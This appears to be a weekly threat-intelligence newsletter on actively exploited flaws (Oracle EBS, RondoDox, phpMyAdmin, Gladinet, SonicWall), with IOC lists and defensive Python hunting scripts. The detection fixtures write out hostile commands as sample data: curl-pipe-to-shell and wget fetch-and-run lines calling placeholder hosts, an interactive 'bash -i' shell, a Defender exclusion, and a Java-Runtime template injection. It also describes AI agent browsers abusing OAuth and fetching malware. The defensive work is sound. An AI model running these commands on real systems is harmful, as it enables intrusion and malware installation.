Sunday Edition: Perimeter Problems, Patching Frenzy

This week was a buffet of the usual suspects: exposed admin panels, edge gear with “please shell me” banners, an enterprise zero-day pressed into extortion, and AI browsers quietly auditioning for “Shadow IT: The Musical.” If you manage anything with a WAN IP or an upload handler, this was not the week to be on PTO.

Actively Exploited, Right Now

Oracle E‑Business Suite zero‑day confirmed: CL0P, GOLDVEIN → SAGE, and extortion

KryptoKat: Google’s Threat Intelligence team and Mandiant confirmed mass exploitation of CVE-2025-61882 in Oracle E‑Business Suite, hitting UiServlet/SyncServlet for unauthenticated RCE. Post‑compromise, attackers deploy a Java implant chain (GOLDVEIN downloader → SAGE loader—variants like SAGEGIFT/SAGELEAF/SAGEWAVE) with an in‑memory servlet filter to live off the land as the applmgr account. It’s tied to CL0P‑branded extortion threatening to leak stolen EBS data. Oracle shipped emergency patches Oct 4–5; apply them yesterday (Oracle Security Alert, GTIG/Mandiant, NVD).

What to do next:

  • Patch all EBS instances and yank public access to UiServlet/SyncServlet. Require VPN/jump hosts and IP allow‑lists.
  • Hunt in DB for abused templates: query XDO_TEMPLATES_B/XDO_LOBS for odd entries (TemplateCode starting TMP/DEF) and review TemplatePreviewPG hits.
  • Memory forensics on Java procs for in‑memory loaders; use GTIG YARA for GOLDVEIN/SAGE.
  • Block C2s: domains pubstorm.com, pubstorm.net; IPs 200.107.207.26, 185.181.60.11, 161.97.99.49, 162.55.17.215, 104.194.11.200.
  • Watch for Java spawning shells (bash -i) and outbound data trickles; rotate any credentials that could be downstream of the app.
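Worked version of the template hunt above, added here as an example rather than anything from GTIG or Oracle. It runs the query against an in-memory SQLite stand-in for XDO_TEMPLATES_B and XDO_LOBS built from constructed rows, so the column subset (TEMPLATE_CODE, APPLICATION_SHORT_NAME, CREATION_DATE; LOB_CODE, LOB_TYPE, FILE_DATA) is an assumption about the real APPS tables and the content markers are our own heuristic. Point the same SQL at the APPS schema through your normal client; the Python around it only shows how to separate legitimate DEF*/TMP* names from the ones with Java inside.

```python
import sqlite3
from datetime import date, datetime, timedelta, timezone

# Constructed sample rows standing in for APPS.XDO_TEMPLATES_B and APPS.XDO_LOBS.
# The column subset is an assumption; the real tables carry many more columns.
TEMPLATES = [
    ("XXHR_PAYSLIP", "PAY", "2021-03-02"),
    ("TMP_a91f", "XDO", "2025-08-12"),          # campaign-style prefix
    ("DEF_x2", "XDO", "2025-08-13"),            # campaign-style prefix
    ("DEFAULT_INVOICE", "AR", "2019-01-10"),    # legitimate, shares the DEF prefix
]
LOBS = [
    ("XXHR_PAYSLIP", "TEMPLATE", b"<?xml version='1.0'?><xsl:stylesheet>payslip layout</xsl:stylesheet>"),
    ("TMP_a91f", "TEMPLATE", b"<xsl:stylesheet xmlns:java='http://xml.apache.org/xalan/java'>"
                             b"<xsl:value-of select='java:lang.Runtime.getRuntime()'/>"),
    ("DEF_x2", "TEMPLATE", b"...ScriptEngineManager..."),
    ("DEFAULT_INVOICE", "TEMPLATE", b"<xsl:stylesheet>plain invoice layout</xsl:stylesheet>"),
]

# Strings that have no business inside a BI Publisher layout template.
# Assumed heuristic, not a published IOC set; tune to your environment.
SUSPICIOUS_MARKERS = (b"java:", b"Runtime", b"ScriptEngineManager", b"ProcessBuilder", b"base64")

def load_sample_db():
    """Build the in-memory stand-in for the two APPS tables from the constructed rows."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE XDO_TEMPLATES_B (TEMPLATE_CODE TEXT, APPLICATION_SHORT_NAME TEXT, CREATION_DATE TEXT);
        CREATE TABLE XDO_LOBS (LOB_CODE TEXT, LOB_TYPE TEXT, FILE_DATA BLOB);
    """)
    con.executemany("INSERT INTO XDO_TEMPLATES_B VALUES (?,?,?)", TEMPLATES)
    con.executemany("INSERT INTO XDO_LOBS VALUES (?,?,?)", LOBS)
    return con

# Template codes with the TMP/DEF prefixes, joined to their LOB payloads so the
# analyst sees code, owning app, creation date and content in one row.
# Note: SQLite LIKE is case-insensitive for ASCII, Oracle's is not; add UPPER() there if needed.
HUNT_SQL = """
SELECT t.TEMPLATE_CODE, t.APPLICATION_SHORT_NAME, t.CREATION_DATE, l.FILE_DATA
FROM XDO_TEMPLATES_B t
LEFT JOIN XDO_LOBS l ON l.LOB_CODE = t.TEMPLATE_CODE AND l.LOB_TYPE = 'TEMPLATE'
WHERE t.TEMPLATE_CODE LIKE 'TMP%' OR t.TEMPLATE_CODE LIKE 'DEF%'
ORDER BY t.CREATION_DATE DESC
"""

def hunt_templates(con, newer_than_days=None, today=None):
    """Return [(code, app, created, reasons)] for templates worth an analyst's time.
    A prefix hit alone is dropped; prefix plus embedded Java/script markers, or prefix
    plus a creation date inside the lookback window, is reported."""
    cutoff = None
    if newer_than_days is not None:
        today_d = date.fromisoformat(today) if today else datetime.now(timezone.utc).date()
        cutoff = today_d - timedelta(days=newer_than_days)
    findings = []
    for code, app, created, data in con.execute(HUNT_SQL):
        reasons = ["prefix"]
        hits = [m.decode() for m in SUSPICIOUS_MARKERS if data and m in data]
        if hits:
            reasons.append("content:" + ",".join(hits))
        if cutoff and date.fromisoformat(created) >= cutoff:
            reasons.append("recent")
        if reasons == ["prefix"]:
            continue
        findings.append((code, app, created, reasons))
    return findings

if __name__ == "__main__":
    con = load_sample_db()
    for finding in hunt_templates(con, newer_than_days=90, today="2025-10-12"):
        print(finding)
```

A prefix hit on its own is weak evidence (DEFAULT_* codes are common in shipped seed data); a prefix hit plus a Java or script marker in the LOB, or a creation date inside your incident window, is what should page someone.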

RondoDox botnet: “exploit shotgun” keeps firing

UncleSp1d3r: RondoDox continues mass‑scanning WAN admin panels on routers, DVR/NVRs, CCTV, and random embedded web servers, then pelting them with ~50–56 n‑days until something cracks. Successful hits hand off to a multi‑arch loader that fetches RondoDox ± Mirai/Morte for DDoS/mining and opportunistic pivoting. New reporting includes hashes/IPs and a published IOC list—use it (Trend Micro, IOC list, DarkReading). CVEs in play include CVE-2023-1389, CVE-2024-3721, CVE-2024-12856, plus newcomers like CVE-2025-7414 and CVE-2025-5504.

Immediate actions:

  • Block public management (HTTP/HTTPS/Telnet/SSH). Gate via VPN/jumps; allow‑list admin IPs.
  • Patch firmware; prioritize KEV and Trend’s callouts. Where vendors are MIA, virtual patch with WAF/IPS for traversal/command‑injection patterns.
  • Hunt for shells spawned by web processes and loader breadcrumbs: “#!/bin/sh”, “chmod 777”, “curl|sh”, rapid file drops.
  • Egress controls for odd HTTP/UDP floods and rotating C2 IPs (74.194.191.52, 83.252.42.112, 38.59.219.27, 14.103.145.202); sample hashes: 24b96599…, 16003678…, 6a77842d….

phpMyAdmin log‑poisoning → AntSword → Nezha (RMM) → Ghost RAT

KryptoKat: Huntress documented a campaign abusing internet‑exposed phpMyAdmin with MariaDB general_log to write a PHP web shell, then driving AntSword to fetch Nezha (legit monitoring agent repurposed as an RMM) and stage Ghost RAT. Post‑compromise, we’ve seen Defender tampering (Add‑MpPreference exclusions), a persistence service misspelled SQLlite, DLL side‑loading, and encrypted C2. Over 100 victims, heavy in East Asia (Huntress, Infosecurity).

Block/hunt highlights:

  • Kill WAN exposure for phpMyAdmin. Require VPN + strong auth; disable general_log in production.
  • Monitor for web shell POSTs (e.g., /htdocs/123.php), httpd/IIS child processes launching curl/powershell.exe.
  • C2s: rism.pages.dev, c.mid.al, gd.bj2.xyz; IPs 54.46.50.255, 45.207.220.12, 172.245.52.169, 38.246.250.201.
  • Host clues: services named SQLlite, files under C:\Windows\Cursors\, mutex gd.bj2[.]xyz:53762:SQLlite.
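The process-tree hunts in this section (httpd/IIS children launching curl or powershell.exe), the RondoDox section (shells under web processes, chmod 777, curl|sh) and the Oracle EBS section (Java spawning bash -i) all reduce to the same check, so here is one added example covering all three; it is ours, not Huntress's, Trend's or GTIG's tooling. It walks a constructed ps-style snapshot, flags any shell or downloader whose ancestor is a web or app server (java, httpd, uhttpd, w3wp.exe and friends), and tags the command-line breadcrumbs the write-ups call out. The process list, the parent/child name sets and the regexes are our assumptions.

```python
import re

# Processes that serve HTTP or host web apps. A shell or downloader beneath one of
# these is the common thread in the EBS, RondoDox and phpMyAdmin write-ups.
WEB_PARENTS = {"java", "httpd", "apache2", "nginx", "php-fpm", "w3wp.exe", "lighttpd", "uhttpd"}
SHELLS_AND_FETCHERS = {"sh", "bash", "dash", "busybox", "curl", "wget", "powershell.exe", "cmd.exe"}

# Command-line breadcrumbs named in this edition. The strings are the page's; the regexes are ours.
BREADCRUMBS = [
    ("reverse-shell", re.compile(r"\bbash\s+-i\b")),
    ("world-writable-drop", re.compile(r"\bchmod\s+777\b")),
    ("curl-pipe-shell", re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b")),
    ("defender-exclusion", re.compile(r"Add-MpPreference\b.*Exclusion", re.I)),
    ("loader-stub", re.compile(r"#!/bin/sh")),
]

# Constructed ps-style snapshot: (pid, ppid, name, cmdline). Addresses are documentation ranges.
SAMPLE_PROCS = [
    (1, 0, "systemd", "/sbin/init"),
    (800, 1, "java", "/u01/jdk/bin/java -Dweblogic.Name=oacore_server1 ..."),
    (801, 800, "bash", "bash -i"),
    (900, 1, "httpd", "/usr/sbin/httpd -DFOREGROUND"),
    (901, 900, "sh", "sh -c 'cd /tmp; curl -s http://198.51.100.7/x.sh | sh; chmod 777 x'"),
    (950, 1, "uhttpd", "/usr/sbin/uhttpd -p 80"),
    (951, 950, "sh", "/bin/sh -c 'wget http://198.51.100.9/bot.mips -O /tmp/.b; chmod 777 /tmp/.b; /tmp/.b'"),
    (1000, 1, "w3wp.exe", "c:\\windows\\system32\\inetsrv\\w3wp.exe -ap \"DefaultAppPool\""),
    (1001, 1000, "cmd.exe", "cmd.exe /c powershell.exe -nop Add-MpPreference -ExclusionPath C:\\Windows\\Cursors"),
    (1100, 1, "sshd", "/usr/sbin/sshd -D"),
    (1101, 1100, "bash", "-bash"),                               # admin login shell, not under a web process
    (1102, 1101, "curl", "curl https://example.org/health"),     # curl under an ssh session: benign
]

def web_ancestor(pid, by_pid):
    """Walk up the parent chain; return the first web-serving ancestor's name, or None."""
    seen = set()
    p = by_pid.get(pid)
    while p and p[0] not in seen:
        seen.add(p[0])
        parent = by_pid.get(p[1])
        if not parent:
            return None
        if parent[2] in WEB_PARENTS:
            return parent[2]
        p = parent
    return None

def hunt_processes(procs):
    """Return findings as (pid, name, web_ancestor, tags).
    A shell/downloader under a web process is a finding even without a breadcrumb;
    breadcrumbs add tags; breadcrumbs outside a web tree are still reported, untagged as web-spawned."""
    by_pid = {p[0]: p for p in procs}
    findings = []
    for pid, ppid, name, cmd in procs:
        tags = [tag for tag, rx in BREADCRUMBS if rx.search(cmd)]
        anc = web_ancestor(pid, by_pid)
        if anc and name in SHELLS_AND_FETCHERS:
            findings.append((pid, name, anc, ["web-spawned-shell"] + tags))
        elif tags:
            findings.append((pid, name, anc, tags))
    return findings

if __name__ == "__main__":
    for f in hunt_processes(SAMPLE_PROCS):
        print(f)
```

Feed it a real snapshot by parsing `ps -eo pid,ppid,comm,args` (or a Sysmon/EDR process-create export) into the same tuples; the ancestor walk is what keeps an admin's curl under sshd out of the results while catching the same curl two levels under httpd.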

Urgent Patch/Protect

Gladinet CentreStack & Triofox CVE-2025-11371: LFI → ViewState deserialization RCE

KryptoKat: Actively exploited, unauthenticated LFI lets attackers read Web.config, lift machine keys, and pivot into a ViewState deserialization RCE on the web tier. Huntress has incidents in hand and a vendor‑endorsed workaround while patches bake: disable the temp handler in UploadDownloadProxy\Web.config. Expect some feature impact; it’s better than feature‑complete backdoors (Huntress, NVD).

Checklist:

  • Pull these portals off the internet; force VPN/allow‑listed admin IPs.
  • Apply the temp handler workaround at C:\Program Files (x86)\Gladinet Cloud Enterprise\UploadDownloadProxy\Web.config.
  • Rotate machine/app keys and anything in Web.config/backups; hunt for web shells and ViewState tampering artifacts; add WAF/IPS for LFI patterns.
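The checklist's two config steps, as an added Python example (not Gladinet's or Huntress's tooling) run against a constructed Web.config: it removes every handler named temp under system.webServer/handlers and regenerates machineKey with fresh random keys. The handler's path/type/verb attributes in the sample are placeholders, because the page does not reproduce the real line; only the handler name comes from the advisory. Run it against a copy, diff the result, then swap it in with the app pool stopped.

```python
import secrets
import xml.etree.ElementTree as ET

# Constructed Web.config fragment shaped like an ASP.NET site config. The "temp"
# handler's path/type/verb values are placeholders, not Gladinet's real attributes.
SAMPLE_WEB_CONFIG = """<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <system.web>
    <machineKey validationKey="0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF"
                decryptionKey="FEDCBA9876543210FEDCBA9876543210"
                validation="SHA1" decryption="AES" />
  </system.web>
  <system.webServer>
    <handlers>
      <add name="UploadHandler" path="upload" verb="*" type="Placeholder.UploadHandler" />
      <add name="temp" path="temp" verb="*" type="Placeholder.TempHandler" />
    </handlers>
  </system.webServer>
</configuration>
"""

def remove_handler(root, handler_name):
    """Delete every <add name=handler_name> under any <handlers> element; return how many went."""
    removed = 0
    for handlers in root.iter("handlers"):
        for add in list(handlers.findall("add")):
            if add.get("name", "").lower() == handler_name.lower():
                handlers.remove(add)
                removed += 1
    return removed

def rotate_machine_key(root):
    """Replace machineKey with fresh random keys and current algorithms.
    Sizes follow ASP.NET guidance: 64-byte validationKey for HMACSHA256, 32-byte decryptionKey for AES-256."""
    sw = root.find("system.web")
    if sw is None:
        sw = ET.SubElement(root, "system.web")
    mk = sw.find("machineKey")
    if mk is None:
        mk = ET.SubElement(sw, "machineKey")
    mk.set("validationKey", secrets.token_hex(64).upper())
    mk.set("decryptionKey", secrets.token_hex(32).upper())
    mk.set("validation", "HMACSHA256")
    mk.set("decryption", "AES")
    return mk

def harden_web_config(xml_text, handler_name="temp"):
    """Apply both steps to a config string; return (new_xml, handlers_removed, new_validation_key)."""
    root = ET.fromstring(xml_text)
    removed = remove_handler(root, handler_name)
    mk = rotate_machine_key(root)
    return ET.tostring(root, encoding="unicode"), removed, mk.get("validationKey")

def handler_names(xml_text):
    """List the handler names still registered, for a before/after check."""
    root = ET.fromstring(xml_text)
    return [a.get("name") for h in root.iter("handlers") for a in h.findall("add")]

if __name__ == "__main__":
    new_xml, removed, _ = harden_web_config(SAMPLE_WEB_CONFIG)
    print(f"removed {removed} handler(s); remaining: {handler_names(new_xml)}")
    print(new_xml)
```

ElementTree drops the XML declaration when serializing to a string; when writing back to disk use `ET.ElementTree(root).write(path, xml_declaration=True, encoding="utf-8")` and keep the original for diffing. Rotating machineKey invalidates outstanding ViewState and forms-auth tickets for the site, which is exactly what you want once the old key may have been read.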

SonicWall, two ways: cloud backup access + Akira on SSL VPNs

UncleSp1d3r: SonicWall confirmed an intruder accessed configuration backups stored in MySonicWall’s cloud backup service—if you used it, assume your configs are in the wild. At the same time, Akira operators are exploiting CVE-2024-40766 on SonicWall SSL VPNs for initial access before the usual smash‑and‑encrypt routine. It’s a lousy pairing: exposed configs plus unpatched VPNs equals easy mode (SonicWall advisory, CISA, Rapid7, Arctic Wolf).

Do now:

  • Rotate everything in backups: admin creds, VPN PSKs, RADIUS/LDAP binds, API tokens, certs/keys; consider disabling cloud backups until validated.
  • Patch for CVE-2024-40766; if you can’t, restrict SSL VPN access via IP allow‑lists or choke‑point a separate ingress VPN/jump.
  • Enforce MFA, revoke suspect OTP seeds; comb VPN/firewall logs for odd logins and short pre‑ransom dwell.
  • Watch for rapid lateral movement and exfil indicators; contain egress from segments with VPN exposure.

Espionage & Targeted Phishing

SideWinder’s “Operation SouthNet”: free‑hosting phishing at scale

KryptoKat: SideWinder is working the South Asia beat with tailored Outlook/Zimbra lures and more than 50 credential‑harvesting portals on Netlify, pages.dev, workers.dev, b4a.run, and friends. They’re also staging payloads in open directories—because if it’s free and public, someone will eventually weaponize it. Expect credential theft → staged malware → long‑dwell espionage (OTX pulse, Hunt.io).

Practical mitigations:

  • Phishing‑resistant MFA (FIDO2) for webmail/admin; block external auto‑forwards; kill legacy auth.
  • Treat free‑hosting URLs as risky by default; URL rewriting/inspection and rate limits on mass‑clicked links.
  • Gateway rules/YARA for credential forms; monitor clusters of similar lures to the same org.

AI‑Adjacent Weirdness

SquareX: AI browsers and agent workflows widen the blast radius

KryptoKat: SquareX dunked on “AI browsers” this week, showing how agent workflows can quietly abuse OAuth consent, silently fetch malware, and mass‑share malicious links through semi‑trusted UI flows. None of this requires a zero‑day—just enthusiastic automation with too much reach, too few guardrails. Treat agentic browsers like you would any new endpoint platform: constrained, monitored, and subject to the same governance you apply to extensions and proxies (SquareX, Security Boulevard).

Programmatic fixes:

  • Inventory and, where possible, disable agent features; require enterprise‑signed extensions.
  • Harden OAuth: minimal scopes, incremental consent, short‑lived tokens, revocation on anomaly; instrument proxies/SSE to flag agent‑initiated OAuth and odd download bursts.
  • Isolate high‑value SaaS workflows in managed/isolated browsers; block unapproved AI browsers from sensitive apps.
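One way to turn the OAuth bullet into a check, added here as an example and not SquareX's or any IdP's code: it parses authorize requests out of constructed proxy records and flags scopes beyond a per-app allow-list, high-risk scopes, a code flow without PKCE, implicit flow, and agent-looking user agents. The client IDs, scope names, redirect URIs and user-agent markers are all assumptions standing in for whatever your IdP and fleet actually emit.

```python
from urllib.parse import urlsplit, parse_qs

# Per-app scope allow-list: the most an approved integration may ask for. Client IDs
# and scope names are constructed to look like Microsoft Graph / Google scopes.
SCOPE_ALLOWLIST = {
    "11111111-aaaa-4bbb-8ccc-000000000001": {"openid", "profile", "email", "Mail.Read"},
    "11111111-aaaa-4bbb-8ccc-000000000002": {"openid", "Files.Read"},
}
# Scopes whose grant turns one consent click into durable, broad access.
HIGH_RISK_SCOPES = {"offline_access", "Mail.ReadWrite", "Mail.Send", "Files.ReadWrite.All",
                    "Directory.ReadWrite.All", "https://www.googleapis.com/auth/drive"}
# User-Agent substrings assumed to identify agentic/AI browser sessions in your fleet.
AGENT_UA_MARKERS = ("agent", "ai-browser", "copilot")

def parse_authorize(url):
    """Pull client_id, scopes, redirect_uri, response_type and PKCE presence out of an authorize URL."""
    q = parse_qs(urlsplit(url).query)
    scopes = set(" ".join(q.get("scope", [""])).split())
    return {
        "client_id": q.get("client_id", [""])[0],
        "scopes": scopes,
        "redirect_uri": q.get("redirect_uri", [""])[0],
        "pkce": "code_challenge" in q,
        "response_type": q.get("response_type", [""])[0],
    }

def assess(url, user_agent):
    """Return the policy findings for one authorize request; an empty list means compliant."""
    req = parse_authorize(url)
    findings = []
    allowed = SCOPE_ALLOWLIST.get(req["client_id"])
    if allowed is None:
        findings.append("unknown-client")
    else:
        extra = req["scopes"] - allowed
        if extra:
            findings.append("excess-scopes:" + ",".join(sorted(extra)))
    risky = req["scopes"] & HIGH_RISK_SCOPES
    if risky:
        findings.append("high-risk-scopes:" + ",".join(sorted(risky)))
    if req["response_type"] == "code" and not req["pkce"]:
        findings.append("no-pkce")
    if "token" in req["response_type"].split():
        findings.append("implicit-flow")
    if any(m in user_agent.lower() for m in AGENT_UA_MARKERS):
        findings.append("agent-initiated")
    return findings

# Constructed proxy records: (user_agent, authorize_url)
SAMPLE_REQUESTS = [
    ("Mozilla/5.0 (Windows NT 10.0) Chrome/130",
     "https://login.example-idp.com/authorize?client_id=11111111-aaaa-4bbb-8ccc-000000000001"
     "&response_type=code&scope=openid+profile+Mail.Read&redirect_uri=https%3A%2F%2Fapp.example%2Fcb"
     "&code_challenge=abc&code_challenge_method=S256"),
    ("ExampleAgentBrowser/1.0 ai-browser",
     "https://login.example-idp.com/authorize?client_id=11111111-aaaa-4bbb-8ccc-000000000002"
     "&response_type=code&scope=openid+Files.Read+Files.ReadWrite.All+offline_access"
     "&redirect_uri=https%3A%2F%2Fapp.example%2Fcb"),
    ("Mozilla/5.0",
     "https://login.example-idp.com/authorize?client_id=deadbeef&response_type=token"
     "&scope=Mail.Send&redirect_uri=https%3A%2F%2Fevil.example%2Fcb"),
]

def scan(requests=SAMPLE_REQUESTS):
    """Assess every record; return [(client_id, findings)] in input order."""
    return [(parse_authorize(u)["client_id"], assess(u, ua)) for ua, u in requests]

if __name__ == "__main__":
    for client, findings in scan():
        print(client, findings or "ok")
```

The scope allow-list is the part worth maintaining: it is the concrete form of "minimal scopes", and an excess-scope finding on a known client is usually an agent or extension quietly asking for more than the integration was approved for.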

Heads‑Up: Coordinated Disclosure Brewing

ZDI‑CAN‑28255 — “All Hands” (CVSS 7.8), long fuse

KryptoKat: ZDI posted an upcoming advisory for All Hands with a 7.8 CVSS and an extended deadline to 2026‑02‑06. No technicals yet, no exploitation noted, but the risk profile screams “don’t expose this to the internet.” Inventory instances, clamp down access, and set WAF/IPS tripwires while you wait (ZDI Upcoming Advisories).

IOC quick‑grab

  • Oracle EBS CVE-2025-61882 C2: pubstorm.com, pubstorm.net; IPs 200.107.207.26, 185.181.60.11, 161.97.99.49, 162.55.17.215, 104.194.11.200. Sample hashes: 76b6d36e…, aa0d3859…, 6fd538e4….
  • RondoDox: IPs 74.194.191.52, 83.252.42.112, 38.59.219.27, 14.103.145.202. See Trend’s full IOC list.
  • phpMyAdmin/Nezha/Ghost: domains rism.pages.dev, c.mid.al, gd.bj2.xyz; IPs 54.46.50.255, 45.207.220.12, 172.245.52.169, 38.246.250.201. Hashes: f3570bb6…, 9f33095a…, 7b2599ed…, 82611e60…, 35e0b221….
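A small matcher for the quick-grab list above that also covers the "free-hosting URLs are risky by default" rule from the SideWinder section. Added example, not from any of the cited vendors: it refangs defanged indicators, pulls the host out of URLs or host:port strings, matches IPs exactly, matches domains by exact name or subdomain (so notpubstorm.com stays clean), and labels hosts on netlify.app, pages.dev, workers.dev and b4a.run as risky rather than known-bad. The proxy log lines are constructed and the free-hosting suffix list is our assumption.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Domains and IPs copied from this edition's quick-grab (hashes are truncated on the page, so omitted).
IOC_DOMAINS = {
    "pubstorm.com", "pubstorm.net",                 # Oracle EBS / GOLDVEIN-SAGE
    "rism.pages.dev", "c.mid.al", "gd.bj2.xyz",     # phpMyAdmin -> Nezha -> Ghost RAT
}
IOC_IPS = {
    "200.107.207.26", "185.181.60.11", "161.97.99.49", "162.55.17.215", "104.194.11.200",
    "74.194.191.52", "83.252.42.112", "38.59.219.27", "14.103.145.202",
    "54.46.50.255", "45.207.220.12", "172.245.52.169", "38.246.250.201",
}
# Free-hosting platforms SideWinder is abusing for phishing portals; a hit here is
# "risky by default", not "known bad". The suffix list is ours, extend as needed.
FREE_HOSTING_SUFFIXES = ("netlify.app", "pages.dev", "workers.dev", "b4a.run")

def refang(s):
    """Undo common defanging so gd.bj2[.]xyz and hxxp:// match their real forms."""
    return re.sub(r"hxxp", "http", s.replace("[.]", ".").replace("(.)", "."), flags=re.I)

def host_of(target):
    """Extract a lowercase hostname (or IP) from a URL, host:port, or bare host."""
    t = refang(target.strip())
    if "://" not in t:
        t = "//" + t
    host = urlsplit(t).hostname or ""
    return host.rstrip(".").lower()

def domain_matches(host, domain):
    """Exact match or a subdomain of `domain`; never a substring match."""
    return host == domain or host.endswith("." + domain)

def classify(target):
    """Return (host, verdict, reason) with verdict in {'ioc', 'risky-hosting', 'clean'}."""
    host = host_of(target)
    if not host:
        return host, "clean", "no host"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        ip = None
    if ip is not None:
        return (host, "ioc", "ip in C2 list") if str(ip) in IOC_IPS else (host, "clean", "ip not listed")
    for d in IOC_DOMAINS:
        if domain_matches(host, d):
            return host, "ioc", f"matches {d}"
    for sfx in FREE_HOSTING_SUFFIXES:
        if domain_matches(host, sfx):
            return host, "risky-hosting", f"free hosting ({sfx})"
    return host, "clean", "no match"

# Constructed proxy log lines: "<timestamp> <src> <action> <url>"
SAMPLE_LOG = """\
2025-10-12T09:01:02Z 10.0.0.5 ALLOW https://update.pubstorm[.]net/sync
2025-10-12T09:01:07Z 10.0.0.5 ALLOW hxxp://185.181.60.11:8443/api/v1
2025-10-12T09:02:11Z 10.0.0.9 ALLOW https://owa-login-helpdesk.netlify.app/index.html
2025-10-12T09:03:40Z 10.0.0.9 ALLOW https://rism.pages.dev/agent.zip
2025-10-12T09:04:01Z 10.0.0.7 ALLOW https://www.example.org/
2025-10-12T09:04:09Z 10.0.0.7 ALLOW https://notpubstorm.com/
"""

def scan_log(text):
    """Return (src, host, verdict, reason) for every line whose verdict is not clean."""
    out = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue
        src, url = parts[1], parts[3]
        host, verdict, reason = classify(url)
        if verdict != "clean":
            out.append((src, host, verdict, reason))
    return out

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Keep the two verdicts separate in whatever you feed this into: an ioc hit on rism.pages.dev is a block-and-investigate, while a risky-hosting hit on some other pages.dev site is a reason to inspect the page for a credential form, not to fire an incident.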

The week in one breath

  • Patch Oracle EBS and lock UiServlet/SyncServlet behind VPN/jumps. Hunt XDO template abuse and in‑memory loaders.
  • Pull CentreStack/Triofox off the internet, apply the temp handler workaround, and rotate keys.
  • Restrict WAN management across edge fleets. Patch or virtually patch RondoDox‑favored CVEs.
  • Rotate SonicWall creds/PSKs/API tokens; patch SSL VPN (CVE-2024-40766), tighten access, and review logs for Akira‑ish activity.
  • Delete public phpMyAdmin from your life. Hunt AntSword/Nezha/Ghost RAT traces.
  • Treat AI browsers like an untrusted new platform: scope, govern, and monitor OAuth+downloads.

Closing thoughts: It is a truth universally acknowledged, that a publicly exposed admin interface in possession of a good banner, must be in want of an exploit. Spend your Monday making that untrue. We’ll bring the tea; you bring the ACLs.

— Kat & Sp1d3r